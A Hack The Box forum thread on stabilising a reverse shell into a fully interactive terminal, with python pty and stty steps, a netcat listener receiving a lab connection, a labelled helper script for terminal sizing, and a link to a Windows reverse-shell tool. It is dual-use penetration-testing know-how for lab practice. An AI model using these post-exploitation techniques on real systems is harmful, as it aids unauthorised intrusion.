Obtaining a Fully Interactive Shell


Comments

  • @KeyboardCaper said:

    After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't I simply find a work around or just deal with what I have.

    Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won't work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a "T".


    Hack The Box
    defarbs.com | Retired Machine Writeups! - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'"
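
Added example (not part of the thread): the "fix up the rows and columns" step from the post above, as a shell function that reads `stty -a` output from the local terminal and prints the matching `stty rows ... columns ...` line. The name `stty_resize_cmd` and the sample `stty -a` lines are constructed for illustration; it goes slightly beyond the post by handling both the GNU (`rows 50`) and BSD/macOS (`50 rows`) layouts.

```shell
#!/bin/sh
# Added example: turn local `stty -a` output into the resize command.
# stty_resize_cmd is a hypothetical helper name, not a standard tool.

# Reads `stty -a` text on stdin, prints "stty rows R columns C".
# Returns non-zero if no usable (positive) size is found.
stty_resize_cmd() {
    awk '
    {
        # Settings are ";"-separated: GNU prints "rows 50", BSD "50 rows".
        n = split($0, clause, ";")
        for (i = 1; i <= n; i++) {
            c = clause[i]
            gsub(/^[ \t]+|[ \t]+$/, "", c)
            if (split(c, w, /[ \t]+/) != 2) continue
            if (w[1] ~ /^(rows|columns)$/ && w[2] ~ /^[0-9]+$/) {
                key = w[1]; val = w[2]
            } else if (w[2] ~ /^(rows|columns)$/ && w[1] ~ /^[0-9]+$/) {
                key = w[2]; val = w[1]
            } else continue
            # A size of 0 means "unset" (typical of a fresh pty); skip it.
            if (val + 0 > 0 && !(key in size)) size[key] = val
        }
    }
    END {
        if (!("rows" in size) || !("columns" in size)) exit 1
        printf "stty rows %d columns %d\n", size["rows"], size["columns"]
    }'
}

# Constructed sample first lines of `stty -a` (not captured from a real host).
GNU_SAMPLE='speed 38400 baud; rows 50; columns 190; line = 0;'
BSD_SAMPLE='speed 9600 baud; 24 rows; 80 columns;'

printf '%s\n' "$GNU_SAMPLE" | stty_resize_cmd
printf '%s\n' "$BSD_SAMPLE" | stty_resize_cmd
```

In the second local terminal, run `stty -a | stty_resize_cmd` and paste the printed line into the remote shell.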

  • I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.

    I start a reverse shell from another machine.

    On my attacking machine I have netcat listening:
    nc -l -v -p 80

    I get the connection on my host:
    listening on [any] 80 ...
    connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
    /bin/sh: can't access tty; job control turned off
    /opt/app #

    I do my routine to elevate the shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    stty raw -echo
    fg
    reset

    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    Any ideas what could go wrong here?

    On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?

  • edited September 2019

    > @timebeyond said:
    > I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.

    > On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?

    You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.

  • Thanks for the reassurance that my standard setup has no flaws. Just wanted to be sure that the problem isn't between the keyboard and the chair.

  • edited September 2019

    If you are looking for a way to get a fully interactive shell on Windows, I just released a C#/PowerShell reverse shell that implements the pty console. Here is the link --> https://github.com/antonioCoco/ConPtyShell

    splintercode

  • > @splintercode said:
    > If you are looking for a way to get a fully interactive shell on Windows, I just released a C#/PowerShell reverse shell that implements the pty console. Here is the link --> https://github.com/antonioCoco/ConPtyShell

    This is absolutely glorious! Just tried it, and suddenly my smb-recon-using-linux-tools-PTSD is cured by the healing light of PS in a PTY :)

  • @splintercode it appears to have some issues deciding which process that listens to the input pipe though. I run the shell from a small PS-stager that IEXs the Invoke-Con*-definition along with an invocation in the same command, and often I get at least two powershell.exe's spinning up a process each for every one I try to start :)

  • edited December 2019

    @scud78 I don't understand the bugged scenario. If you can open an issue on GitHub (https://github.com/antonioCoco/ConPtyShell/issues) I could troubleshoot the scenario and work for a fix.

    splintercode

  • @splintercode said:
    @scud78 I don't understand the bugged scenario. If you can open an issue on GitHub (https://github.com/antonioCoco/ConPtyShell/issues) I could troubleshoot the scenario and work for a fix.

    Turns out it was the combination of three (or possibly four) nested powershell processes (including yours) with DUPd stdhandles. Not much you can do about that, really ;)

  • Hey, my terminal lags like crazy when I'm upgrading my shell to a fully interactive one with python -c 'import ..... It happens after I type in stty raw -echo and foreground the nc session. Does anybody have a similar issue?

  • Indeed a fun box. A little observation, OSINT and boom. Rest is pretty simple.

  • PM me if you need any help.

  • @MrSHolmes said:

    Indeed a fun box. A little observation, OSINT and boom. Rest is pretty simple.

    Did you post this on the wrong thread?

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!
